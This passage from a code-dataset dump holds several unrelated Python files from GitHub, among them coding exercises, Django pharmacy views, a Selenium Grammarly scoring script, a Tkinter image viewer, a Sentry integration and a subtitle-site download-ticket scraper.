= 1\n remap = {}\n for line in lines:\n data_comment = line.strip().split('#')\n items = data_comment[0].split()\n print('%s' % items[0], end='')\n phi = []\n for pair in range(1,len(items)):\n (feature,val) = items[pair].split(':')\n if feature not in remap:\n gf = gf + 1\n remap[feature] = gf\n phi.append((remap[feature],float(val)))\n phi.sort()\n for p in phi:\n print(' %d:%f' % (p[0],p[1]), end='')\n print(' # %s' % data_comment[1])\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print('Usage: %s file.libsvm' % sys.argv[0])\n else:\n lines = open(sys.argv[1]).readlines()\n svm2svm(lines)\n","repo_name":"lambday/KLog","sub_path":"src/py/svm2svm.py","file_name":"svm2svm.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3257836164","text":"import parse\r\nfrom collections import defaultdict\r\n\r\nSQUARE_SIZE = 1000\r\n\r\nclass Claim(object):\r\n _format = parse.compile(\"#{id} @ {x},{y}: {w}x{h}\")\r\n def __init__(self, claim_str):\r\n r = Claim._format.parse(claim_str)\r\n self.id = int(r[\"id\"])\r\n self.x = int(r[\"x\"])\r\n self.y = int(r[\"y\"])\r\n self.w = int(r[\"w\"])\r\n self.h = int(r[\"h\"])\r\n self.str = claim_str\r\n\r\n def to_1d_space(self):\r\n linear_space = defaultdict(int)\r\n for i in range(self.x, self.x + self.w):\r\n for j in range(self.y, self.y + self.h):\r\n linear_space[i + j * SQUARE_SIZE] = 1\r\n\r\n return linear_space\r\n\r\n def __str__(self):\r\n return self.str\r\n\r\ndef part1(claims):\r\n linear_space = defaultdict(int)\r\n for claim in claims:\r\n claim_space = claim.to_1d_space()\r\n for x in claim_space:\r\n linear_space[x] += 1\r\n\r\n overlaps = 0\r\n for elem in linear_space:\r\n if linear_space[elem] > 1:\r\n overlaps += 1\r\n\r\n print(\"overlaps: {}\".format(overlaps))\r\n\r\n\r\ndef part2(claims):\r\n linear_space = defaultdict(int)\r\n for claim in claims:\r\n claim_space = claim.to_1d_space()\r\n for x in claim_space:\r\n linear_space[x] += 1\r\n\r\n for claim in claims:\r\n correct_claim = True\r\n\r\n for i in range(claim.x, claim.x + claim.w):\r\n for j in range(claim.y, claim.y + claim.h):\r\n if linear_space[i + j * SQUARE_SIZE] != 1:\r\n correct_claim = False\r\n\r\n if correct_claim:\r\n print(\"unique claim: {}\".format(claim))\r\n\r\n\r\n\r\n\r\ndef main():\r\n claims = []\r\n with open(\"input\", \"r\") as f:\r\n claims_str = f.read().split(\"\\n\")\r\n for claim_str in claims_str:\r\n 
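# parse each raw input line into a Claim object\r\n 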
claims.append(Claim(claim_str))\r\n\r\n part1(claims)\r\n part2(claims)\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()","repo_name":"CLEMENTINATOR/AdventOfCode2018","sub_path":"03122018/03122018.py","file_name":"03122018.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38101489467","text":"from django.shortcuts import render,redirect\nfrom Pharma.models import Medicine,Transactions\nfrom Pharma.forms import MedicineForm, TransactionsForm\nfrom django.shortcuts import get_object_or_404\nfrom django.forms import modelformset_factory,inlineformset_factory\n# Create your views here.\n\n\ndef login_page(request):\n if request.method == 'POST':\n return redirect('Pharma:home')\n return render(request, 'login.html')\n\n# def create_med(request):\n# Formset = inlineformset_factory( Medicine,\n# extra = 5,\n# fields = ('scientific_name','trade_name','alternate1', 'alternate2' ,'qnt', 'item_price', 'start_date','end_date'),\n# )\n# if request.method == 'POST':\n# form = Formset(request.POST)\n# form.save()\n# return redirect('Pharma:medicine')\n# form = Formset(queryset = Medicine.objects.none())\n# return render(request, 'createmed.html', {'form':form})\n\ndef create_med(request):\n Formset = modelformset_factory(Medicine, fields = ('scientific_name','trade_name','alternate1', 'alternate2' ,'qnt', 'item_price', 'start_date','end_date'), extra=5)\n if request.method == 'POST':\n form = Formset(request.POST)\n form.save()\n return redirect('Pharma:medicine')\n form = Formset(queryset = Medicine.objects.none())\n return render(request, 'createmed.html', {'form':form})\n\ndef create_trans(request):\n Formset = modelformset_factory(Transactions, fields = ('med_name','sell_qnt','sell_price', 'sell_date'), extra=5)\n if request.method == 'POST':\n form = Formset(request.POST)\n form.save()\n return redirect('Pharma:transactions')\n form = Formset(queryset = Transactions.objects.none())\n return render(request, 'createtrans.html', {'form':form})\n\ndef list_medicine(request):\n medicine_list = Medicine.objects.order_by('trade_name')\n return render(request, 'listmedicine.html', {'medicine_records':medicine_list})\n\ndef list_transactions(request):\n transactions_list = Transactions.objects.order_by('med_name')\n return render(request, 'listtransactions.html', {'transactions_records':transactions_list})\n\ndef get_loggedin_user(request):\n name = request.POST['uname']\n print(name)\n return render(request, 'master.html', {'your_name':name})\n\ndef update_medicine(request, id = None):\n form = MedicineForm()\n instance = get_object_or_404(Medicine, id = id)\n form = MedicineForm(instance=instance)\n\n if request.method == 'POST':\n form = MedicineForm(request.POST, instance=instance)\n\n if form.is_valid():\n print(\"form is valid\")\n instance.save()\n return redirect('Pharma:medicine')\n\n context = {\n 'form' : form\n }\n\n return render(request, 'modelform.html', context)\n\n\ndef delete_medicine(request, id =None):\n instance = get_object_or_404(Medicine, id = id)\n if request.method == 'POST':\n instance.delete()\n # return redirect('Pharma:medicine')\n return render(request, 'listmedicine.html', {'insert_med':instance})\n\n\ndef update_transaction(request, id = None):\n form = TransactionsForm()\n instance = get_object_or_404(Transactions, id = id)\n form = TransactionsForm(instance=instance)\n\n if request.method == 'POST':\n form = TransactionsForm(request.POST, instance=instance)\n\n 
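# only persist the update when the posted data passes validation\n 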
if form.is_valid():\n print(\"form is valid\")\n instance.save()\n return redirect('Pharma:transactions')\n\n context = {\n 'form' : form\n }\n\n return render(request, 'modelform.html', context)\n\n\ndef delete_transaction(request, id =None):\n instance = get_object_or_404(Transactions, id = id)\n if request.method == 'POST':\n instance.delete()\n # return redirect('Pharma:transactions')\n return render(request, 'listtransactions.html', {'insert_med':instance})\n","repo_name":"daliaakram/PharmacyProject","sub_path":"Pharma/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3861,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"40420788724","text":"class Node:\n def __init__(self,value):\n self.value = value\n self.left = None\n self.right = None\n \n \nclass BinarySearchTree:\n def __init__(self):\n self.root = None\n \n def insert(self,value):\n new_node = Node(value)\n if self.root is None:\n self.root = new_node\n return True\n else:\n curr = self.root\n while curr is not None:\n if new_node.value == curr.value:\n return False\n if value < curr.value:\n if curr.left is None:\n curr.left = new_node\n return True\n curr = curr.left\n else:\n if curr.right is None:\n curr.right = new_node\n return True\n curr = curr.right\n\n def contains(self,value):\n curr = self.root\n while curr is not None:\n if curr.value == value:\n return True\n if value < curr.value:\n if curr.left is None:\n return False\n curr = curr.left\n else: \n if curr.right is None:\n return False\n curr = curr.right\n return False\n \n\n \nmy_tree = BinarySearchTree()\nprint(my_tree.contains(52))\nmy_tree.insert(47)\nmy_tree.insert(21)\nmy_tree.insert(76)\nmy_tree.insert(18)\nmy_tree.insert(52)\n\nprint(my_tree.contains(52))\n\n\n\nprint(my_tree.root.value)\nprint(my_tree.root.left.value)\nprint(my_tree.root.left.left.value)\nprint(my_tree.root.right.value)\nprint(my_tree.root.right.left.value)\n\n\n","repo_name":"ddoddii/Study-repo","sub_path":"algorithm/Data_Structures_Algorithms/Trees/EXERCISE-BST.py","file_name":"EXERCISE-BST.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11328263881","text":"\"\"\"\n# WRITER : Dor Peleg , dor.peleg , 312163421\n# EXERCISE : intro2cs1 Ex3 2021\n\"\"\"\n\n\ndef input_list():\n \"\"\"\n The function receives inputs from user,\n and returns a list of the inputs, and their sum at the end of the list.\n \"\"\"\n num_lst = []\n num_sum = 0\n while True:\n num = input()\n if num == \"\":\n break\n num_lst.append(float(num))\n num_sum += float(num)\n num_lst.append(num_sum)\n return num_lst\n\n\ndef inner_product(vec_1, vec_2):\n \"\"\"\n The function gets two lists of numbers,\n and returns their inner product.\n \"\"\"\n ip = 0\n if id(vec_1) == id(vec_2):\n return\n elif len(vec_1) != len(vec_2):\n return None\n for i in range(len(vec_1)):\n ip += vec_1[i] * vec_2[i]\n return ip\n\n\ndef sequence_monotonicity(sequence):\n \"\"\"\n The function receives a sequence (list of numbers),\n and returns if the sequence is\n monotonically increasing, strictly monotonically increasing,\n monotonically decreasing or strictly monotonically decreasing\n as a list of boolean values.\n \"\"\"\n boolean_lst = [True, True, True, True]\n for i in range(1, len(sequence)):\n if sequence[i - 1] > sequence[i]:\n boolean_lst[0] = False\n if sequence[i - 1] >= sequence[i]:\n boolean_lst[1] = False\n if sequence[i - 1] < 
sequence[i]:\n boolean_lst[2] = False\n if sequence[i - 1] <= sequence[i]:\n boolean_lst[3] = False\n return boolean_lst\n\n\ndef monotonicity_inverse(def_bool):\n \"\"\"\n The function receives a list of 4 boolean values\n and returns a list of 4 numbers representing a Sequence\n that is an example of a Sequence according to the received list.\n \"\"\"\n if not def_bool[0] and not def_bool[1] and \\\n not def_bool[2] and not def_bool[3]:\n return [1, 2, 1, 2]\n\n if def_bool[0]:\n if def_bool[3]:\n return None\n elif def_bool[1]:\n if def_bool[2]:\n return None\n return [1, 2, 3, 4]\n elif def_bool[2]:\n return [1, 1, 1, 1]\n return [1, 2, 2, 4]\n\n if def_bool[2]:\n if def_bool[1]:\n return None\n elif def_bool[3]:\n return [4, 3, 2, 1]\n return [4, 3, 3, 1]\n\n return None\n\n\ndef primes_for_asafi(n):\n \"\"\"\n The function gets an integer n\n and returns a list of the first n prime numbers.\n \"\"\"\n primes = []\n num = 2\n while len(primes) < n:\n prime = True\n for i in primes:\n if num % i == 0:\n prime = False\n if prime:\n primes.append(num)\n num += 1\n return primes\n\n\ndef sum_of_vectors(vec_lst):\n \"\"\"\n The function receives a list of vectors (list of lists)\n and returns a vector (list) which is their vector sum.\n \"\"\"\n vec_sum = []\n if len(vec_lst) == 0:\n return None\n else:\n for i in range(len(vec_lst[0])):\n index_sum = 0\n for j in vec_lst:\n index_sum += j[i]\n vec_sum.append(index_sum)\n return vec_sum\n\n\ndef num_of_orthogonal(vectors):\n \"\"\"\n The function receives a list of vectors (list of lists)\n and returns the number of pairs of lists\n that are perpendicular to each other\n \"\"\"\n counter = 0\n for i in vectors:\n for j in vectors:\n if inner_product(i, j) == 0:\n counter += 1\n return int(counter / 2)\n","repo_name":"dor-peleg/University","sub_path":"First_year/Intro/Ex3/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":3479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"18836139871","text":"# https://leetcode.com/explore/challenge/card/july-leetcoding-challenge-2021/611/week-4-july-22nd-july-28th/3827/\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def sortedArrayToBST(self, a: List[int]) -> TreeNode:\n if not a:\n return None\n mid=len(a)//2\n root = TreeNode(val=a[mid])\n root.left=self.sortedArrayToBST(a[:mid])\n root.right=self.sortedArrayToBST(a[mid+1:])\n return root","repo_name":"Tejas1510/Leetcode-Daily-Question","sub_path":"August/aug26_arrayToBST.py","file_name":"aug26_arrayToBST.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"35829528826","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.chrome.options import Options\nimport numpy as np\nimport pandas as pd\nimport time\nimport pickle\nfrom selenium.webdriver.common.keys import Keys;\n\ndef grammarly_scoring(text_dataset):\n driver_location = \"/usr/bin/chromedriver\"\n pickle_location = \"grammarly.pkl\"\n chrome_options = Options()\n chrome_options.add_experimental_option(\"detach\", True)\n grammarly_query = \"https://app.grammarly.com\" \n grammarly_driver, grammarly_input = initialize_grammarly_driver(driver_location, chrome_options, grammarly_query, pickle_location)\n scores = 
pd.DataFrame(columns = ['Score'])\n checkpoint_after = 10\n\n for index, row in text_dataset.iterrows():\n try:\n score, grammarly_input, grammarly_driver = get_plagiarism(grammarly_driver, grammarly_input, row['Text'])\n scores = scores.append({'Score': score}, ignore_index = True)\n except:\n scores = scores.append({'Score': np.NAN}, ignore_index = True)\n \n if index % checkpoint_after == 0:\n scores.to_csv(\"Grammarly_Scores.csv\")\n\n scores.to_csv(\"Grammarly_Scores.csv\")\n\n return \"Grammarly_Scores.csv\"\n\ndef initialize_grammarly_driver(driver_location, chrome_options, query, pickle_location): \n\n driver = webdriver.Chrome(driver_location, chrome_options = chrome_options) #Initializing selenium chromedriver\n \n driver.get(query)\n cookies = pickle.load(open(pickle_location, \"rb\"))\n for cookie in cookies:\n driver.add_cookie(cookie)\n\n driver.get(query)\n\n time.sleep(5)\n new = driver.find_element(By.XPATH, \"//*[@id='page']/div/div/main/div[4]/div/section/div/div/div[1]/div/div[2]/div\")\n new.click()\n\n time.sleep(5)\n input = driver.find_element(By.XPATH, \"//*[@id='page']/div/div[2]/div[2]/div/div[4]/div[3]/div/main/div/div/div[10]/div[1]/p\")\n input.send_keys(\"Test\")\n\n time.sleep(5)\n plag = driver.find_element(By.XPATH, \"//*[@id='navbar-right']/div[2]/div/div[3]/div[3]\")\n plag.click()\n\n return driver, input\n\ndef get_plagiarism(driver, input, text):\n \n input.send_keys(text)\n\n time.sleep(10)\n if(driver.find_elements(By.XPATH, \"//*[name() = 'svg'][contains(@class, 'circular_f1rbnyxg')]/*[name()='text']\")):\n b6 = driver.find_element(By.XPATH, \"//*[name() = 'svg'][contains(@class, 'circular_f1rbnyxg')]/*[name()='text']\")\n input.clear()\n return np.float16(b6.text.replace(\"%\",\"\")), input, driver\n\n input.clear()\n return 0, input, driver\n\n\n","repo_name":"czhuai/CS640-Project-Team-10","sub_path":"large_dataset/grammarly.py","file_name":"grammarly.py","file_ext":"py","file_size_in_byte":2575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23941125024","text":"from django_select2.forms import *\nfrom django import forms\nfrom documentos.models import *\n\nclass DateInput(forms.DateInput):\n \"\"\"docstring forDateInput.\"\"\"\n input_type = 'date'\n\n\nclass TimeInput(forms.TimeInput):\n \"\"\"docstring forTime.\"\"\"\n input_type='time'\n\nclass DocumentoForm(forms.ModelForm):\n \"\"\"DocumentoForm description)\"\"\"\n\n class Meta:\n model = Documento\n\n fields='__all__'\n\n labels={\n 'usuario' : 'Participante'\n }\n widgets={\n 'fecha_inicio':DateInput(),\n 'hora':TimeInput(),\n 'fecha_fin':DateInput(),\n 'usuario':Select2MultipleWidget,\n 'entidad_emisora':Select2MultipleWidget,\n }\n\nclass EntidadEmisoraForm(forms.ModelForm):\n \"\"\"docstring for EntidadEmisoraForm.\"\"\"\n class Meta:\n model = EntidadEmisora\n\n fields='__all__'\n","repo_name":"DaxH/Certificado","sub_path":"documentos/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7571487888","text":"#This is the Extra Credit Part of Our Homework\nfrom graphics import *\nfrom HW6_Map import initializeMap\nfrom graphics import *\nfrom LatLongToPixels import *\nfrom HW6_Filter import *\nfrom RealestateData import *\ndef Extracredit():\n win=initializeMap('SacramentoMap.gif', 707, 774)\n #get and draw two end points of line\n Text(Point(360,680),\"Click on one point on the map and then 
click on another point the required distance apart\").draw(win)\r\n    p1 = win.getMouse()\r\n    p1.draw(win)\r\n    p2 = win.getMouse()\r\n    p2.draw(win)\r\n    x1 = p1.getX()\r\n    x2 = p2.getX()\r\n    y1 = p1.getY()\r\n    y2 = p2.getY()\r\n    C=LatLong(707,774,38.24,39.03,-121.56,-120.6)\r\n    one= C.pixels2LatLong(x1,y1)\r\n    two= C.pixels2LatLong(x2,y2)\r\n    a1,a2=one\r\n    b1,b2=two\r\n    d=distanceMiles(a1,a2,b1,b2)\r\n    return filter(a2,a1,d) #see readme file to understand the output you get\r\n\r\n","repo_name":"rtl019/MLpractice","sub_path":"extracredit.py","file_name":"extracredit.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"}
+{"seq_id":"37867381370","text":"from ordered_weighted_avg import OWA\n\ndef shimura_technique(ranks, improve = False) :\n    print(\"Shimura Technique\")\n    length = len(ranks[0])\n    n = len(ranks)\n    f = [[0.0 for x in range(length)] for y in range(length)] \n\n    print(\"f_x_j(x_i) = |k\\u0395[1, N] ^ l_k(x_i) < l_k(x_j)| / N = \")\n    for x_i in range(length):\n        for x_j in range(length):\n            if x_i == x_j:\n                f[x_i][x_j] = 1\n            else:\n                count = 0\n                for rank in ranks:\n                    if rank[x_i] < rank[x_j]:\n                        count+=1\n                f[x_i][x_j] = round(count/n, 4)\n            print(f[x_i][x_j], end = \"\\t\")\n        print()\n\n    if not improve:\n        find_minimum(length, f)\n\n    else:\n        improved_shimura_technique(length, f)\n    \n\ndef find_minimum(length, f):\n    minimum_c = []\n    print(\"Where this func. is taken to be the membership of preferring x_i over x_j\")\n    print(\"f(x_i|x_j) = f_x_j(x_i) / max(f_x_j(x_i), f_x_j(x_j)) = \")\n    for x_i in range(length):\n        minimum = f[x_i][0]\n        for x_j in range(length):\n            maximum = max(f[x_i][x_j], f[x_j][x_i])\n            f[x_i][x_j] = round(f[x_i][x_j] / maximum, 4)\n            minimum = min(f[x_i][x_j], minimum)\n            print(f[x_i][x_j], end = \"\\t\")\n        minimum_c.append([minimum, x_i])\n        print()\n\n    print(\"C_j = minimum of each row = \")\n    for minimum in minimum_c:\n        print(minimum[1], f\"[{minimum[0]}]\") \n\n    print(\"ordering of pages with minimum value = \")\n    minimum_c.sort()\n    for minimum in minimum_c:\n        print(minimum)\n\ndef improved_shimura_technique(length, f):\n    minimum_c = []\n    for x, val in enumerate(f):\n        val.sort(reverse = True)\n        ob = OWA(0.0, .5, val)\n        atleast_half = ob.find_weight()\n        minimum_c.append([atleast_half, x])\n    \n    print(\"Based on Condorcet Criteria: if some element d belonging to a set defeats \\\n    \\nevery other element in pairwise majority voting, then this element is ranked first; \\\n    \\nnecessary for spam fighting. 
\")\n print(\"Atleast half of each row = \")\n for minimum in minimum_c:\n print(minimum[1], f\"[{minimum[0]}]\") \n\n print(\"ordering of pages with minimum value = \")\n minimum_c.sort(reverse=True)\n for minimum in minimum_c:\n print(minimum)\n\ndef main():\n n = int(input(\"Enter the number of lists : \"))\n k = int(input(\"Enter the number of pages : \"))\n ranks = []\n for i in range(n):\n ranks.append([0]*k)\n for j,rank in enumerate(input().strip().split()):\n ranks[i][int(rank)-1] = j+1\n\n improved = input(\"Improved shimura technique (y/n) :\") == 'y'\n shimura_technique(ranks, improved)\n \nif __name__ == \"__main__\":\n main()","repo_name":"Asra2000/COE4380","sub_path":"shimura_technique.py","file_name":"shimura_technique.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2068506290","text":"import tkinter as tk\nfrom tkinter import END, ttk\nimport os\nfrom PIL import ImageTk, Image\nimport random as rand\n\nfrom config import *\nfrom ImageDisplayer import *\n\nclass ViewPage(tk.Frame):\n def __init__(self, parent, controller):\n tk.Frame.__init__(self, parent)\n\n self.ID = \"VIEW\"\n\n # TITLE\n l = ttk.Label(self, text=\"Saved Images\")\n l.grid(row=0, column=2, pady=20)\n\n # Back Button\n BACK = ttk.Button(self, text=\"Back to Home\", command=lambda:[controller.showFrame(\"HOME\"), self.hideCaptions()])\n BACK.grid(row=11, column=0, pady=20)\n\n # Canvas \n self.CANVAS = tk.Canvas(self, width=CANVAS_W, height=CANVAS_H, bd=5, relief=\"raised\")\n self.CANVAS.grid(row=1, column=0, rowspan=10, columnspan=5)\n\n # Caption list\n self.TEXT_LIST = []\n\n # Images\n self.IMG_LIST = []\n self.IMG_LIST = IM_loadImageList(SIMG_DIR)\n if len(self.IMG_LIST) > 1:\n self.INDEX = rand.randint(0, len(self.IMG_LIST)-1)\n else:\n self.INDEX = 0\n IM_viewImage(SIMG_DIR, self.CANVAS, self.IMG_LIST, self.INDEX)\n\n # Scroll images\n right_b = ttk.Button(self, text=\"->\", command=lambda:[self.moveIndex(1), IM_viewImage(SIMG_DIR, self.CANVAS, self.IMG_LIST, self.INDEX), self.loadCaptions()])\n right_b.grid(row=0, column=3)\n left_b = ttk.Button(self, text=\"<-\", command=lambda:[self.moveIndex(-1), IM_viewImage(SIMG_DIR, self.CANVAS, self.IMG_LIST, self.INDEX), self.loadCaptions()])\n left_b.grid(row=0, column=1)\n\n # Add caption button\n addcaption_b = ttk.Button(self, text=\"Add Caption\", command=lambda:self.createCaption())\n addcaption_b.grid(row=0, column=4)\n\n # Save caption button\n savecaption_b = ttk.Button(self, text=\"Save Caption\", command=lambda:[self.saveCaptions()])\n savecaption_b.grid(row=0, column=0)\n\n def saveCaptions(self):\n if self.IMG_LIST:\n c = \"\"\n for t in self.TEXT_LIST:\n c += t.get(\"1.0\", END)\n\n with open(\"SavedImages/Captions/\"+self.IMG_LIST[self.INDEX]+\".txt\", 'w+') as f:\n f.write(c)\n f.close()\n\n def createCaption(self, text=\"\"):\n t = tk.Text(self, width=30, height=5)\n t.grid(row=1+len(self.TEXT_LIST), column=5)\n if text != \"\":\n t.insert(tk.END, text)\n self.TEXT_LIST.append(t)\n\n def moveIndex(self, x):\n if self.INDEX + x < 0:\n self.INDEX = len(self.IMG_LIST)-1\n elif self.INDEX + x == len(self.IMG_LIST):\n self.INDEX = 0\n else:\n self.INDEX += x\n\n def hideCaptions(self):\n for t in self.TEXT_LIST:\n t.destroy()\n\n def loadCaptions(self):\n if self.IMG_LIST:\n for t in self.TEXT_LIST:\n t.destroy()\n self.TEXT_LIST = []\n ptf = \"SavedImages/Captions/\"+self.IMG_LIST[self.INDEX]+\".txt\"\n if os.path.exists(ptf):\n f = 
open(ptf, 'r')\n captions = f.read()\n listc = captions.split(\"\\n\")\n for c in listc:\n self.createCaption(c)\n","repo_name":"blucas6/tkinter-image-viewer","sub_path":"ViewPage.py","file_name":"ViewPage.py","file_ext":"py","file_size_in_byte":3200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41258252973","text":"import os\n\nfrom sentry_sdk.api import configure_scope\nfrom sentry_sdk.integrations import Integration\n\n\ndef _read_classad(filename):\n with open(filename) as f:\n for line in f:\n key, _, value = line.partition('=')\n key = key.strip()\n value = value.strip().strip('\"')\n yield key, value\n\n\nclass CondorIntegration(Integration):\n \"\"\"Custom Sentry integration to report the HTCondor job ID.\"\"\"\n\n identifier = 'condor'\n\n @staticmethod\n def setup_once():\n try:\n data = dict(_read_classad(os.environ['_CONDOR_JOB_AD']))\n except (KeyError, IOError):\n pass\n else:\n with configure_scope() as scope:\n scope.set_tag('htcondor.cluster_id', '{}.{}'.format(\n data['ClusterId'], data['ProcId']))\n","repo_name":"lpsinger/gwcelery","sub_path":"gwcelery/sentry/integrations/condor.py","file_name":"condor.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"71929996646","text":"import logging\r\nlogger = logging.getLogger(\"subit.api.providers.torec.hamster\")\r\nfrom threading import Thread\r\nfrom collections import deque, namedtuple\r\nimport time\r\n\r\nfrom api.providers.torec.provider import TOREC_PAGES\r\n\r\n__all__ = ['TorecHashCodesHamster']\r\n\r\n\r\n# Time it takes for us to invalidate a ticket. The value is taken from the JS\r\n# in torec handling the waiting time.\r\nMAX_TICKET_SECS = 10\r\nTICKETS_QUEUE_SIZE = 5\r\nRUNNER_MAIN_LOOP_SLEEP_SECS = 1\r\n# The time each sub id will live inside the hamster. 
After this long, the sub\r\n# id will be removed from the list.\r\nMAX_TIME_FOR_SUB_ID_SECS = 120\r\n\r\n\r\nclass SubIDRecord(object):\r\n    def __init__(self, \r\n        time_added, post_content, tickets = None):\r\n\r\n        self.time_added = time_added\r\n        self.post_content = post_content\r\n        # Create a fresh deque per record; a mutable default argument would be\r\n        # shared by every SubIDRecord instance.\r\n        self.tickets = tickets if tickets is not None else deque(maxlen=TICKETS_QUEUE_SIZE)\r\n\r\n    @property\r\n    def should_remove(self):\r\n        return (int(time.time()) - self.time_added) > MAX_TIME_FOR_SUB_ID_SECS\r\n\r\n    def __str__(self):\r\n        return repr(self)\r\n\r\n    def __repr__(self):\r\n        return (\"<SubIDRecord time_added={0.time_added} \"\r\n            \"post_content={0.post_content} tickets={0.tickets}>\".format(self))\r\n\r\n\r\nclass TorecTicket(object):\r\n    def __init__(self, sub_id, time_got, guest_code):\r\n        self.sub_id = sub_id\r\n        self.time_got = time_got\r\n        self.guest_code = guest_code\r\n        logger.debug(\"Constructed a ticket: {}\".format(self))\r\n\r\n    @property\r\n    def time_past(self):\r\n        return int(time.time()) - self.time_got\r\n    \r\n    @property\r\n    def time_to_wait(self):\r\n        return MAX_TICKET_SECS - self.time_past\r\n\r\n    @property\r\n    def is_still_valid(self):\r\n        return self.time_to_wait >= 0\r\n\r\n    def wait_required_time(self):\r\n        ttw = self.time_to_wait\r\n        if ttw:\r\n            logger.debug(\"Ticket requires sleeping for {} secs\".format(ttw))\r\n            time.sleep(ttw)\r\n\r\n    def __str__(self):\r\n        return repr(self)\r\n\r\n    def __repr__(self):\r\n        return (\"<TorecTicket sub_id={0.sub_id} \"\r\n            \"time_got={0.time_got} guest_code={0.guest_code}>\".format(self))\r\n\r\n\r\nclass TorecHashCodesHamster(object):\r\n    \"\"\"\r\n    The hamster is responsible for obtaining download tickets from Torec's \r\n    servers for all the sub_ids that were passed to it.\r\n\r\n    The hamster iterates over all its sub_ids, and makes sure that they have a\r\n    valid ticket. Each sub_id has a queue of size TICKETS_QUEUE_SIZE that gets\r\n    filled as time passes.\r\n\r\n    The hamster keeps requesting tickets for a given sub_id until the user marks\r\n    that sub_id for deletion.\r\n    \"\"\"\r\n    def __init__(self, requests_manager):\r\n        self._requests_manager = requests_manager\r\n\r\n        self._should_stop = False\r\n        self._records = {}\r\n        # Start the runner on its own daemon thread.\r\n        hamsterRunner = Thread(target=self._runner)\r\n        hamsterRunner.daemon = True\r\n        hamsterRunner.start()\r\n\r\n    def __del__(self):\r\n        \"\"\" \r\n        On destruction, we call the stop method in order to stop the worker \r\n        thread.\r\n        \"\"\"\r\n        self.stop()\r\n\r\n    def _ensure_has_ticket(self, sub_id):\r\n        record = self._records[sub_id]\r\n\r\n        guest_code = None\r\n        while not guest_code:\r\n            logger.debug(\r\n                \"Getting ticket with: {}\".format(record.post_content))\r\n            guest_code = self._requests_manager.perform_request_next(\r\n                TOREC_PAGES.TICKET,\r\n                data = record.post_content)\r\n            if guest_code == 'error':\r\n                logger.error(\r\n                    \"Failed getting ticket for sub_id: {}\".format(sub_id))\r\n\r\n        time_got = int(time.time())\r\n        ticket = TorecTicket(sub_id, time_got, guest_code)\r\n        logger.debug(\"Got ticket: {}\".format(ticket))\r\n        record.tickets.append(ticket)\r\n\r\n    def _runner(self):\r\n        \"\"\" \r\n        The worker of this class. On every loop it requests a hash code and \r\n        stores it in the queue as a (request time, hash code) pair. 
The queue holds at most TICKETS_QUEUE_SIZE items; once full, the oldest \r\n        tickets are discarded.\r\n        \"\"\"\r\n        logger.debug(\"_runner started.\")\r\n\r\n        while not self._should_stop:\r\n            # Iterate over a snapshot of the keys, because the dict may change \r\n            # (records get deleted) during the iteration.\r\n            for sub_id in list(self._records.keys()):\r\n                record = self._records[sub_id]\r\n                if record.should_remove:\r\n                    logger.debug(\r\n                        \"_runner Removing record for sub_id: {}\".format(sub_id))\r\n                    del self._records[sub_id]\r\n                else:\r\n                    self._ensure_has_ticket(sub_id)\r\n\r\n            time.sleep(RUNNER_MAIN_LOOP_SLEEP_SECS)\r\n        \r\n        logger.debug(\"_runner ending.\")\r\n\r\n    def stop(self):\r\n        \"\"\" Signals the working thread to stop. \"\"\"\r\n        self._should_stop = True\r\n\r\n    def add_sub_id(self, sub_id):\r\n        \"\"\" \r\n        Adds sub_id to the dict. Does not check whether or not that sub_id is\r\n        in the dict already. This means that if a ticket was already obtained, \r\n        it will be removed for that sub_id.\r\n        \"\"\"\r\n        # s according to Torec's JS is the screen width.\r\n        post_content = {\"sub_id\" : sub_id, \"s\" : 1600}\r\n        logger.debug(\"Constructed post_content: {}\".format(post_content))\r\n        record = SubIDRecord(int(time.time()), post_content)\r\n        self._records[sub_id] = record\r\n\r\n    def remove_sub_id(self, sub_id):\r\n        del self._records[sub_id]\r\n\r\n    def _get_valid_ticket(self, sub_id):\r\n        record = self._records[sub_id]\r\n        tickets = record.tickets\r\n        while not tickets:\r\n            time.sleep(0.5)\r\n\r\n        ticket = tickets.popleft()\r\n        while not ticket.is_still_valid and tickets:\r\n            ticket = tickets.popleft()\r\n\r\n        # Recurse if no valid ticket was found; the runner will supply more.\r\n        if not ticket.is_still_valid:\r\n            return self._get_valid_ticket(sub_id)\r\n\r\n        return ticket\r\n    \r\n    def get_ticket(self, sub_id):\r\n        \"\"\" \r\n        Retrieve the ticket associated with the provided sub_id. If the sub_id \r\n        is not in the dict, this method adds it. 
